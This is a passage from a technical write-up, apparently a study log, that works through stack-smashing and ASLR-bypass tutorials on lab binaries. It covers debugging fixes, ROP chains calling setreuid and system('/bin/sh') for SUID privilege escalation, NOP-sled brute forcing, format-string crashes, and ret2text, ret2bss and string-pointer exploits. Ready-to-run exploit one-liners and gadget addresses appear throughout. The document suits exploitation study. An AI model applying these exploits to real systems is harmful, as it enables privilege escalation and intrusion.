<li>It is not possible to set a breakpoint in the vulnerable executable and attach GDB to the running process, as <code>socat</code> only executes the vulnerable executable on a new connection and the memory the breakpoint refers to thus is not loaded yet. This behavior leads to an error in GDB because it cannot access the memory at the specified location.<br />
This problem can be solved by setting a breakpoint, disabling the breakpoint, setting a catchpoint on execution of a new executable and continuing. GDB then automatically breaks when <code>socat</code> spawns the vulnerable executable. Then, it is sufficient to enable the breakpoint again and continue, as the corresponding address is now located in memory. The first automatic steps (until breaking at the catchpoint) can be achieved by the command <code>gdb-pwndbg -ex &quot;b BREAK&quot; -ex &quot;dis&quot; -ex &quot;catch exec&quot; -ex &quot;c&quot; -q -p $(pidof socat)</code>, where <code>BREAK</code> is the breakpoint (no matter whether using <code>gdb</code>, <code>gdb-pwndbg</code>, etc.).</li>
<li>The offset for <code>memset</code> in libc cannot be determined the way it is done in the tutorial. Determined like that, we only get the offset of the generic <code>memset</code> function. However, on modern Linux systems, the GNU IFUNC functionality dispatches dynamically to specialized functions depending on CPU features. On the current machine (VM as specified in <a href="#virtual-machine-setup">Virtual Machine setup</a> running on an Intel Core i5-6300HQ), the GOT entry of <code>memset</code> thus does not point to the generic <code>memset</code> in libc, but to <code>__memset_avx2_unaligned</code> in libc, which makes use of the AVX2 instructions in modern Intel Core or AMD CPUs. Such ifuncs are not displayed when reading the symbols from libc, so we cannot easily determine the offset just by calling <code>readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset</code>. Fortunately, there exists a <a href="https://github.com/ZetaTwo/ifunc-dumper">git repository</a> which provides the code to build the <code>ifunc-resolver</code> utility to get the offsets in libc of such specialized functions.<br />
With this offset, it is finally possible to determine the correct libc base address and thus the correct address of the <code>system</code> function.</li>
<li>Even with those issues resolved, we can observe in GDB that the exploit succeeds in that it calls <code>system</code> correctly. However, it does not spawn a shell and returns immediately.<br />
The error is not easy to find, as we’re jumping to <code>system</code> instead of calling it and GDB thus does not show the arguments. Also, stepping through the <code>system</code> call in GDB stops at a call to <code>posix_spawn</code> with the aforementioned error. The parameters to that call don’t reveal anything about the argument to the <code>system</code> call, which makes it difficult to spot the error.<br />
The solution is as follows: the address provided in the tutorial to write the “/bin/sh” string to is not writable in the environment used for creating the exploit. However, the <code>read</code> call reading from <code>stdin</code> and writing to that address neither crashes nor yields an error. With that behavior, we’re actually not calling <code>system(&quot;/bin/sh&quot;)</code> but <code>system(whatever is located at the non-writable address)</code>. Therefore, the <code>system</code> call fails, as it tries to execute whatever is located at that address as a shell command. By changing the supposedly writable address to an actually writable address (here: a location in the <code>.bss</code> section of the ELF executable), the exploit finally succeeds, as it can write the “/bin/sh” string to that location and pass it as an argument to <code>system</code>.</li>
</ol>
<p>The final exploit code crafted from the addresses found in the executable (compiled/linked as non-PIE) and the aforementioned approaches to find offsets and addresses is located in the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc.py">poc.py</a> Python script. It relies on the executable being available over the network as mentioned above.</p>
<p>However, it is also possible to launch such an exploit locally. This was conducted using the Python <code>pwntools</code>. The <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc_local.py">poc_local.py</a> contains the code for a local exploit. In addition to the original exploit, this variant also calls <code>setreuid</code> in order to achieve privilege escalation when a vulnerable executable with the SUID bit set is exploited.</p>
<h2 id="optimizing-compilation-1">Optimizing compilation</h2>
<p>As with the executables from the <a href="#smashing-the-stack-for-fun-and-profit---aleph1">Aleph1 exploits</a>, no compiler optimizations were activated during the compilation of the executables used for the three parts of the tutorial. With optimizations enabled (<code>-O3</code> flag), the exploits have to be conducted slightly differently, which is explained in the following.</p>
<h3 id="part-1-1">Part 1</h3>
<p>The <a href="#part-1">first part</a> was just about overflowing a buffer and overwriting the return address with the address of an environment variable on the stack. The main difference here is that GCC tries to keep some variables only in registers if possible when optimization is enabled.</p>
<p>Here, the variable <code>int r</code> is affected by such an optimization.<br />
In the non-optimized version, 96 bytes on the stack are reserved for the buffer <code>buf</code> and the integer variable <code>r</code>. Those 96 bytes are divided into 80 bytes for the buffer and 16 bytes for the integer. <code>r</code> as a 32 bit integer should theoretically only need 4 bytes of memory on the stack. However, the stack by default is always aligned on 16 bytes on x86_64 / amd64 architectures which is why 96 bytes of stack memory are allocated.<br />
In the optimized version, only 80 bytes on the stack are reserved for the buffer <code>buf</code>. The integer variable <code>r</code> is never written on the stack. As a return value of the call to <code>read</code>, <code>r</code> is located in the register <code>rax</code> after that call. The value is then directly copied from <code>rax</code> to <code>rsi</code> which holds a parameter for <code>printf</code>. Thus, only 80 bytes of stack memory are necessary here.</p>
<p>This is the reason why the overflow with the <code>pwn_vulnerable.sh</code> script does not work: Initially, it overwrites 104 bytes with junk (80 bytes for <code>buf</code>, 16 bytes for <code>r</code> and padding, 8 bytes for the saved frame pointer) and then the return address with the address of the environment variable. With the optimized executable, it should only overwrite 88 bytes (80 bytes for <code>buf</code>, 8 bytes for the saved frame pointer) with junk. As it overwrites 104 bytes, it also overwrites the return address with junk which is why returning from the vulnerable function gives a segmentation fault.</p>
<p>This issue can easily be resolved with a small change to the exploit script by changing <a href="./64bit%20Stack%20smashing%20-%20superkojiman/pwn_vulnerable.sh#L14">line 14</a> from</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb15-1" data-line-number="1"><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(b'A' * 104 + pack('&lt;Q', </span><span class="va">$addr</span><span class="st">))&quot;</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb16-1" data-line-number="1"><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(b'A' * 88 + pack('&lt;Q', </span><span class="va">$addr</span><span class="st">) * 3)&quot;</span></a></code></pre></div>
<p>Instead of providing 104 bytes of junk and an 8 byte address (= 112 bytes total), it then provides 88 bytes of junk and three times an 8 byte address (= 112 bytes total).<br />
For the non-optimized vulnerable executable, this doesn’t make a difference for the result. The only difference is that the last 8 bytes before the saved frame pointer and the saved frame pointer are overwritten with the address we want to return to instead of junk.<br />
For the optimized vulnerable executable, the return address is now written to the right position on the stack. The buffer and the saved frame pointer are completely overwritten with junk. Parts of the previous stack frame are also overwritten (i.e. its lowest 16 bytes with twice the address). However, as we just want to return to the shellcode, this doesn’t make a difference for the result here.</p>
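<p>The layout argument above can be checked with a small Python sketch. The offsets are the ones derived in the text; the address is a placeholder and <code>build_payload</code> is a hypothetical helper, not part of <code>pwn_vulnerable.sh</code>.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def build_payload(addr, junk_len=88, copies=3):
    """Junk followed by `copies` little-endian 8-byte copies of addr."""
    return b"A" * junk_len + addr.to_bytes(8, "little") * copies

# Offsets of the saved return address relative to the start of buf,
# as derived in the text.
RET_OFFSET_PLAIN = 80 + 16 + 8      # buf + r and padding + saved frame pointer
RET_OFFSET_OPTIMIZED = 80 + 8       # buf + saved frame pointer

addr = 0x00007FFFFFFFE000           # placeholder, not a real address
payload = build_payload(addr)
packed = addr.to_bytes(8, "little")

# The same 112-byte input places the address at both candidate offsets.
for offset in (RET_OFFSET_PLAIN, RET_OFFSET_OPTIMIZED):
    assert payload[offset:offset + 8] == packed
print(len(payload))                 # 112</code></pre></div>
<p>Repeating the address only works here because a single value is written; a longer chain of distinct values cannot be duplicated in this way.</p>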
<h3 id="part-2-1">Part 2</h3>
<p>For part 2 of the tutorial, basically the same changes apply as for <a href="#part-1-1">part 1</a>. Instead of padding with 104 bytes of junk, we only need 88 bytes of padding if the executable is compiled with compiler optimizations.</p>
<p>In addition to that, we’re not overwriting the return address with a stack address that we determined before but with the address of an instruction in the same executable. With compiler optimizations enabled, GCC may place the code at different offsets (position independent executables, PIE) or addresses (non-PIE). This is exactly what happens here: the address of the <code>ret</code> instruction in the <code>vuln</code> function changed. Luckily, all other addresses stayed the same despite the optimized code. Explicitly, this means that the addresses referring to <code>__libc_csu_init</code> and the <code>/bin/sh</code> string didn’t change. The addresses of the functions from libc (i.e. <code>system</code> and <code>setreuid</code>) didn’t change either, as libc is always loaded at the same base address while ASLR is disabled, no matter whether the executable was compiled with compiler optimizations enabled or not.</p>
<p>Thus, it is sufficient to change the lines</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb17-1" data-line-number="1">    b<span class="st">'A'</span> <span class="op">*</span> <span class="dv">104</span> <span class="op">+</span>                        <span class="co"># Padding to reach the return address</span></a>
<a class="sourceLine" id="cb17-2" data-line-number="2">    pack(<span class="st">'&lt;Q'</span>, <span class="bn">0x00005555555551da</span>) <span class="op">+</span>    <span class="co"># Address of ret in function vuln</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb18"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb18-1" data-line-number="1">    b<span class="st">'A'</span> <span class="op">*</span> <span class="dv">88</span> <span class="op">+</span>                         <span class="co"># Padding to reach the return address</span></a>
<a class="sourceLine" id="cb18-2" data-line-number="2">    pack(<span class="st">'&lt;Q'</span>, <span class="bn">0x0000555555555204</span>) <span class="op">+</span>    <span class="co"># Address of ret in function vuln</span></a></code></pre></div>
<p>in the <a href="#part-2">original exploit codes</a>.</p>
<p>Applied to the exploit variant that includes the <code>setreuid</code> call, this change results in the following code, which works for the optimized executable:</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb19-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb19-2" data-line-number="2"><span class="st">    b'A' * 88 +                         # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb19-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x0000555555555204) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb19-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root</span></a>
<a class="sourceLine" id="cb19-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x0000555555555271) +    # Address of pop rsi; pop r15; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-7" data-line-number="7"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root (into rsi)</span></a>
<a class="sourceLine" id="cb19-8" data-line-number="8"><span class="st">    pack('&lt;Q', 0x4141411411414141) +    # Junk (into r15)</span></a>
<a class="sourceLine" id="cb19-9" data-line-number="9"><span class="st">    pack('&lt;Q', 0x00007ffff7eda920) +    # Address of function setreuid</span></a>
<a class="sourceLine" id="cb19-10" data-line-number="10"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-11" data-line-number="11"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb19-12" data-line-number="12"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb19-13" data-line-number="13"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>For the non-optimized version, the original code has to be used. Thus, it is in that case not possible to create a single input that triggers the vulnerability in both the non-optimized and the optimized executable reliably.</p>
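<p>As a rough sketch, the two variants can be generated from one hypothetical helper in which only the padding and the address of the <code>ret</code> instruction differ. All addresses are copied from the listings above and are only meaningful for the executables and the libc used in this write-up; <code>p64</code> and <code>build_chain</code> are names chosen for this illustration.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def p64(value):
    """Pack an integer as an 8-byte little-endian quadword."""
    return value.to_bytes(8, "little")

def build_chain(padding, ret_gadget):
    """Assemble the chain from the text; only the two arguments vary."""
    pop_rdi = 0x0000555555555273              # pop rdi; ret
    pop_rsi_r15 = 0x0000555555555271          # pop rsi; pop r15; ret
    words = [
        ret_gadget,                           # ret in function vuln
        pop_rdi, 0,                           # rdi = 0 (uid of root)
        pop_rsi_r15, 0, 0x4141414141414141,   # rsi = 0, r15 = junk
        0x00007FFFF7EDA920,                   # setreuid
        pop_rdi, 0x000055555555603F,          # rdi = address of "/bin/sh"
        0x00007FFFF7E18410,                   # system
    ]
    return b"A" * padding + b"".join(p64(word) for word in words)

plain = build_chain(104, 0x00005555555551DA)
optimized = build_chain(88, 0x0000555555555204)

# At offset 88 the non-optimized input still contains junk, whereas the
# optimized input already contains the first chain entry.
print(plain[88:96], optimized[88:96])</code></pre></div>
<p>The comparison at offset 88 illustrates why one input cannot serve both executables: the chain consists of distinct values, so it cannot simply be repeated at both offsets.</p>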
<h3 id="part-3-1">Part 3</h3>
<p>For part 3 of the tutorial, the changes are very similar to those made for <a href="#part-2-1">part 2</a> when compiling with optimizations enabled. Specifically, stack offsets differ and addresses change. In addition, the compiler omits a function call, which requires some smaller changes to the exploit code.</p>
<p>Firstly, the junk padding that fills the stack from the start of the buffer up to and including the saved frame pointer now interestingly needs 184 bytes instead of 168. In the original version, 152 bytes (because of the alignment to whole quadwords for a 150 byte buffer) were used to overflow the buffer, 8 for the <code>ssize_t b</code> variable and another 8 bytes for the saved frame pointer. Now, the <code>ssize_t b</code> variable is no longer saved on the stack but kept in registers thanks to compiler optimizations. Theoretically, the stack offset should thus shrink, but in practice it grows by 16 bytes, which I can’t explain so far. Thus, we have to use a padding of 184 bytes instead of 168 bytes now.</p>
<p>Secondly, addresses changed. The exploit uses fixed addresses for the procedure linkage table (PLT) and the global offset table (GOT) as well as for the chain of <code>pop rdi; pop rsi; pop rdx; ret</code> found in the helper function, and those addresses differ when the executable is compiled with compiler optimizations.</p>
<p>Thirdly, the original exploit made use of the <code>memset</code> function and overwrote its GOT entry in order to point to the <code>system</code> function instead. This is not possible anymore with the executable compiled with optimizations enabled, as <code>memset</code> was omitted from the executable and replaced by the following instructions (comments added for clarification):</p>
<div class="sourceCode" id="cb20"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb20-1" data-line-number="1"><span class="bu">xor</span>    %<span class="kw">eax</span>,%<span class="kw">eax</span>            # Zero <span class="bu">out</span> <span class="kw">eax</span></a>
<a class="sourceLine" id="cb20-2" data-line-number="2"><span class="bu">mov</span>    <span class="dv">$</span><span class="bn">0x12,</span>%<span class="kw">ecx</span>           # Number of repetitions (<span class="dv">18</span>)</a>
<a class="sourceLine" id="cb20-3" data-line-number="3"><span class="bu">xor</span>    %<span class="kw">edx</span>,%<span class="kw">edx</span>            # Zero <span class="bu">out</span> <span class="kw">edx</span></a>
<a class="sourceLine" id="cb20-4" data-line-number="4"><span class="bu">push</span>   %<span class="kw">rbp</span>                 # Save base frame pointer</a>
<a class="sourceLine" id="cb20-5" data-line-number="5"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0xa8</span>,%<span class="kw">rsp</span>           # Increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb20-6" data-line-number="6"><span class="bu">mov</span>    %<span class="kw">rsp</span>,%<span class="kw">rbp</span>            # Update base frame pointer</a>
<a class="sourceLine" id="cb20-7" data-line-number="7"><span class="bu">mov</span>    %<span class="kw">rbp</span>,%<span class="kw">rdi</span>            # Set <span class="kw">rdi</span> to base frame pointer (address of buffer)</a>
<a class="sourceLine" id="cb20-8" data-line-number="8">rep <span class="bu">stos</span> %<span class="kw">rax</span>,%<span class="kw">es</span>:(%<span class="kw">rdi</span>)    # Set <span class="kw">ecx</span> quadwords to <span class="kw">rax</span> (= <span class="dv">0</span>), starting <span class="bu">from</span> <span class="kw">rdi</span> (buffer)</a>
<a class="sourceLine" id="cb20-9" data-line-number="9"><span class="bu">mov</span>    %<span class="kw">dx</span>,<span class="bn">0x4</span>(%<span class="kw">rdi</span>)        # Set <span class="kw">rdi</span> + <span class="dv">4</span> to <span class="dv">0</span></a>
<a class="sourceLine" id="cb20-10" data-line-number="10">movl   <span class="dv">$</span><span class="bn">0x0,</span>(%<span class="kw">rdi</span>)          # Set <span class="kw">rdi</span> to <span class="dv">0</span></a></code></pre></div>
<p>Those instructions set up the buffer and then zero it out. Thus, they replace the call to <code>memset</code> which would do exactly the same.</p>
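<p>To see that these stores cover exactly the 150 byte buffer, they can be replayed on a Python <code>bytearray</code>. This is only a model of the three store instructions, assuming the direction flag is clear so that <code>rdi</code> advances by 8 after each quadword; the function name is made up for this sketch.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def zero_buffer_like_optimized_code(memory, start):
    """Replay the stores of the listing; return the number of bytes cleared."""
    rdi = start
    for _ in range(0x12):                     # rep stos: ecx = 18 repetitions
        memory[rdi:rdi + 8] = bytes(8)        # store the 8 zero bytes of rax
        rdi += 8                              # rdi advances after each store
    memory[rdi + 4:rdi + 6] = bytes(2)        # mov %dx,0x4(%rdi): 2 bytes
    memory[rdi:rdi + 4] = bytes(4)            # movl $0x0,(%rdi): 4 bytes
    return rdi + 6 - start

memory = bytearray(b"\xff" * 160)
cleared = zero_buffer_like_optimized_code(memory, 0)
print(cleared)                                # 150</code></pre></div>
<p>The 18 quadwords account for 144 bytes; the two trailing stores clear the remaining 4 + 2 bytes.</p>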
<p>As <code>memset</code> now is not part of the executable anymore (in the PLT and GOT), an alternative is necessary. Luckily, the executable contains several calls to external functions which are listed in the PLT and GOT. Therefore, we can use for example <code>printf</code> and its PLT and GOT entries instead of those for <code>memset</code>.<br />
However, we cannot choose an arbitrary function to replace <code>memset</code>: If we overwrote the GOT entry of <code>read</code> instead of <code>memset</code>, the exploit would not work anymore as it relies on <code>read</code> to manipulate the memory (GOT entries and .bss section).</p>
<p>As a proof of concept for those changes, the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc_local_optimized.py">poc_local_optimized.py</a> Python script manages to spawn a shell and elevate the privileges if the SUID bit is set for the executable compiled with compiler optimizations enabled. The differences between <code>poc_local.py</code> and <code>poc_local_optimized.py</code> can be transferred to the network-based exploits (<code>poc.py</code>, <code>poc_advanced.py</code>) analogously (changes in padding size and addresses).</p>
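<p>The padding sizes quoted for part 3 can be recomputed with a few lines of Python. The sketch only reproduces the arithmetic from the text; the value for the optimized executable is the observed one, not a derived one.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def align_up(size, alignment=8):
    """Round size up to the next multiple of alignment."""
    return -(-size // alignment) * alignment

buffer_bytes = align_up(150)              # 150 byte buffer, quadword aligned
padding_plain = buffer_bytes + 8 + 8      # + ssize_t b + saved frame pointer
padding_optimized = 184                   # observed, 16 bytes more than before

print(buffer_bytes, padding_plain, padding_optimized - padding_plain)</code></pre></div>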
<h1 id="aslr-smack-and-laugh">ASLR Smack and Laugh</h1>
<p>The <a href="https://api.semanticscholar.org/CorpusID:16401261">ASLR Smack &amp; Laugh Reference</a> by Tilo Müller, published in 2008, describes several methods for bypassing the protection offered by Address Space Layout Randomization (ASLR) as built into the Linux kernel.<br />
As he uses a Linux installation with kernel 2.6.23, glibc 2.6.1 and gcc 4.2.3, several of his described exploits might not work as described on modern machines. Additionally, his machine is a 32 bit machine which is why all the executables are compiled in 32 bit mode (see the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/Makefile">Makefile</a>).</p>
<p><strong>For these exploits, ASLR is of course activated in the Linux kernel</strong> (e.g. by issuing the command <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>).</p>
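<p>Before running the exploits, the current setting can be read back. The following Python sketch is one possible way to do so; the labels follow the wording of the kernel documentation for <code>randomize_va_space</code>, and the function names are chosen for this example.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">from pathlib import Path

# Meaning of the values according to the kernel documentation.
ASLR_MODES = {
    0: "off",
    1: "mmap base, stack and VDSO page randomized",
    2: "additionally heap randomized",
}

def describe_aslr(raw):
    """Translate the content of randomize_va_space into a short label."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")

def current_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read and describe the setting on a Linux machine."""
    return describe_aslr(Path(path).read_text())

print(describe_aslr("2\n"))</code></pre></div>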
<h2 id="general-observations">General observations</h2>
<p>In section 2, Tilo Müller describes the functioning of ASLR.<br />
On his machine, the heap address as well as the addresses of the <code>.text</code>, <code>.data</code> and <code>.bss</code> sections of the executable are not randomized. All of those addresses are randomized on a modern machine by default (see also the <a href="#virtual-machine-setup">section about the VM setup</a>). This makes it harder to run the exploits the same way he does. It is not possible to have a fixed heap address without turning off ASLR in general. According to <a href="https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html">the Linux kernel documentation</a>, setting the ASLR option to 1 should randomize the stack addresses but not the heap addresses. As the documentation hasn’t been updated since kernel version 2.2 (as of 08/04/2020), this behavior seems to have changed for current kernel versions, as the heap base address is always randomized if the <code>randomize_va_space</code> kernel option is set to a value other than 0.<br />
The sections of the executable, however, can be kept at fixed addresses: compiling with the <code>-fno-pic</code> compiler flag and linking with the <code>-no-pie</code> linker flag produces position-dependent executables that use absolute addresses and are always loaded at the same base address.</p>
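<p>Whether an executable was actually linked as non-PIE can be verified from its ELF header: the <code>e_type</code> field is <code>ET_EXEC</code> (2) for position-dependent executables and <code>ET_DYN</code> (3) for PIE executables and shared objects. A minimal sketch, with helper names chosen for this example:</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">ELF_TYPES = {2: "ET_EXEC (non-PIE)", 3: "ET_DYN (PIE or shared object)"}

def elf_type(header):
    """Classify an ELF file from its first 18 bytes."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    byteorder = "little" if header[5] == 1 else "big"    # EI_DATA
    e_type = int.from_bytes(header[16:18], byteorder)    # follows e_ident
    return ELF_TYPES.get(e_type, "other")

def elf_type_of_file(path):
    """Classify the ELF file stored at path."""
    with open(path, "rb") as handle:
        return elf_type(handle.read(18))</code></pre></div>
<p>For example, <code>elf_type_of_file("./ret2text")</code> would be expected to report <code>ET_EXEC</code> if the flags above took effect.</p>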
<h2 id="aggression">Aggression</h2>
<h3 id="brute-force">Brute force</h3>
<p><a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bruteforce.c">bruteforce.c</a> contains a buffer overflow vulnerability. With ASLR turned on, it is not possible to deterministically overflow this buffer and execute some shellcode, as the address of the buffer containing the shellcode changes with every run.<br />
Thus, the shellcode is placed in a buffer with a big NOP sled in front of the shellcode. Here, the buffer is very big (4096 bytes), so it is easy to hit the NOP sled by brute forcing the overflow. If the buffer were smaller, we could also place the shellcode with the NOP sled in an environment variable and just overflow the buffer with addresses pointing to the environment variable, as it was done in previous sections.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bfexploit.c">bfexploit</a> executable prepares a buffer with the shellcode and an address to overflow the buffer in the vulnerable executable. The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/bfexploit.sh">bfexploit.sh</a> shell script then executes the vulnerable executable over and over again until the buffer is correctly overflowed and the overwritten return pointer points somewhere into the NOP sled in front of the shellcode.</p>
<p>As given in the paper, the base address used for calculating pseudo-random addresses for overwriting the return pointer was <code>0xbf010101</code>. This address, however, does not work here, as the stack addresses on modern machines with randomized addresses start with <code>0xff</code>. Changing <code>0xbf010101</code> to <code>0xff010101</code> finally led to success after a number of attempts.</p>
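<p>The shape of a single attempt can be sketched as follows. This is not the code of <code>bfexploit.c</code>: the gap between the buffer and the return pointer, the placeholder shellcode and the function name are assumptions made for illustration only.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">NOP = b"\x90"                            # x86 no-operation instruction

def build_attempt(guess, shellcode, buffer_size=4096, gap=4):
    """NOP sled and shellcode filling the buffer, then the guessed address."""
    sled = NOP * (buffer_size - len(shellcode))
    filler = b"A" * gap                  # assumed: the saved frame pointer
    return sled + shellcode + filler + guess.to_bytes(4, "little")

placeholder_shellcode = b"\xcc" * 24     # int3 bytes standing in for shellcode
attempt = build_attempt(0xFF010101, placeholder_shellcode)
print(len(attempt), attempt[-4:])</code></pre></div>
<p>The base value <code>0xff010101</code> contains no zero byte, which matters whenever the payload is copied as a C string. The longer the sled, the larger the range of guessed addresses that lead to the shellcode.</p>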
<h3 id="denial-of-service">Denial of service</h3>
<p>As we can see during the execution of a <a href="#brute-force">brute force attack</a>, the executable segfaults most of the time because we’re overwriting the return address with an invalid value.</p>
<p>The same applies to format string vulnerabilities: for the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/formatStringDos.c">formatStringDos</a> executable, it is sufficient to pass several <code>%s</code> conversion specifiers until the <code>printf</code> call tries to read from memory it is not allowed to read and crashes. An even more reliable crash can be achieved by passing <code>%n</code> specifiers that try to write to memory, as the executable is usually allowed to write to even less memory than it is allowed to read from.</p>
<h2 id="return-into-non-randomized-memory">Return into non-randomized memory</h2>
<h3 id="ret2text">ret2text</h3>
<p>The exploit in this case relies on the executable being loaded at the same address every time, even if the stack addresses change. The exploit itself is then fairly simple:</p>
<ul>
<li>Look up the address of the function we want to jump to (here: <code>secret</code>) via <code>gdb</code> or <code>objdump</code></li>
<li>Calculate the string used for overwriting the buffer (here: 16 bytes padding (12 for the buffer, 4 for the frame pointer) + return address)</li>
<li>Execute the program (here: <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 16 + b'\xff\x91\x04\x08')&quot;)</code>)</li>
</ul>
<p>An interesting observation is that it is completely sufficient to call <code>./ret2text $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 16)&quot;)</code>. This doesn’t actually overwrite the return address completely, in fact we’re not even accessing the memory where the return address resides intentionally. As any string ends with a 0 byte and we have little endian representation, the input consisting of 16 A characters (or any 16 bytes except 0 bytes) overwrites the lowest byte of the return address unintentionally with 0. Coincidentally, the return address formerly pointing back into the <code>main</code> function points to the second byte of the <code>secret</code> function if the last byte of the address is set to 0. Thus, the <code>secret</code> function is still executed without even knowing the correct address in this case.</p>
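<p>The effect of the terminating 0 byte can be modelled in Python. The frame layout follows the text (12 bytes buffer, 4 bytes frame pointer, 4 bytes return address); the original return address is a hypothetical value inside <code>main</code>, and the helper names are made up for this sketch.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def strcpy_into_frame(frame, data):
    """Copy data plus the terminating 0 byte to the start of the frame."""
    copied = data + b"\x00"
    frame[:len(copied)] = copied
    return frame

def saved_return_address(frame):
    """Read the 4-byte little-endian return address behind buffer and frame pointer."""
    return int.from_bytes(frame[16:20], "little")

original_ret = 0x0804925B                       # hypothetical address in main
frame = bytearray(16) + bytearray(original_ret.to_bytes(4, "little"))

strcpy_into_frame(frame, b"A" * 16)
print(hex(saved_return_address(frame)))         # 0x8049200</code></pre></div>
<p>Only the lowest byte changes, so the trick depends on the original return address sharing its upper three bytes with the target.</p>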
<h3 id="ret2bss">ret2bss</h3>
<p>The idea behind this exploit is the same as the one behind <a href="#ret2text">ret2text</a>: the .bss section of the executable always resides at the same static address and can thus easily be accessed, even when the stack addresses are randomized.<br />
The advantage over ret2text is that we often can control what is written to the .bss area (see e.g. <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2bss.c">ret2bss</a>). Thus, we can write our shellcode to the buffer in the .bss memory area and then conveniently access it by overflowing a buffer on the stack so that the return address points to our global buffer in .bss.</p>
<p>An important point to mention is that we still need an executable stack, even though we do not execute shellcode from the stack. This is because the .bss area in the executable (ELF) is marked as NOBITS (check e.g. with <code>readelf ./ret2bss -S</code>) which means that the address is fixed but the memory area is actually not part of the executable file itself but allocated when loading the program into memory based on the size of this section given in the file. Apparently, this allocated memory has the same permissions as the stack. Therefore, if the stack is not executable, data in the .bss section is also not executable.</p>
<h3 id="ret2data">ret2data</h3>
<p>This exploit works exactly the same way as <a href="#ret2bss">ret2bss</a> does. The only difference is that the buffer now is initialized with data and can thus be found in the .data section of the ELF executable instead of the .bss section. Therefore, the memory used for that buffer actually is part of the executable and not freshly allocated at runtime as it was with the .bss area.</p>
<p>Conveniently, even the buffer’s address stays the same when compiling the code (compare e.g. <code>objdump -d -j .data -j .bss ./ret2data</code> and <code>objdump -d -j .data -j .bss ./ret2bss</code>) and thus the same <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2bssexploit.c">exploit</a> works for both executables.</p>
<h3 id="ret2heap">ret2heap</h3>
<p>On modern systems, the heap addresses are randomized by ASLR as well. This makes it as hard to execute shellcode from the heap as from the stack. Therefore, the same strategies apply as for shellcode on the stack (e.g. <a href="#brute-force">brute force attacks</a>).</p>
<h2 id="pointer-redirecting">Pointer redirecting</h2>
<h3 id="string-pointers">String pointers</h3>
<p>With hardcoded strings in the executable, it is pretty easy to find their addresses using <code>gdb</code> or <code>objdump</code>. If we can then create an executable (here: <code>echo &quot;/bin/sh&quot; &gt; THIS &amp;&amp; chmod 777 THIS &amp;&amp; export PATH=.:$PATH</code>) that has the same name as the first word of one of the hardcoded strings, we can just overwrite the address of one string with the address of another and thus execute a different command than the vulnerable program’s author intended.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit.sh">strptrexploit.sh</a> bundles all the necessary steps in a shell script.</p>
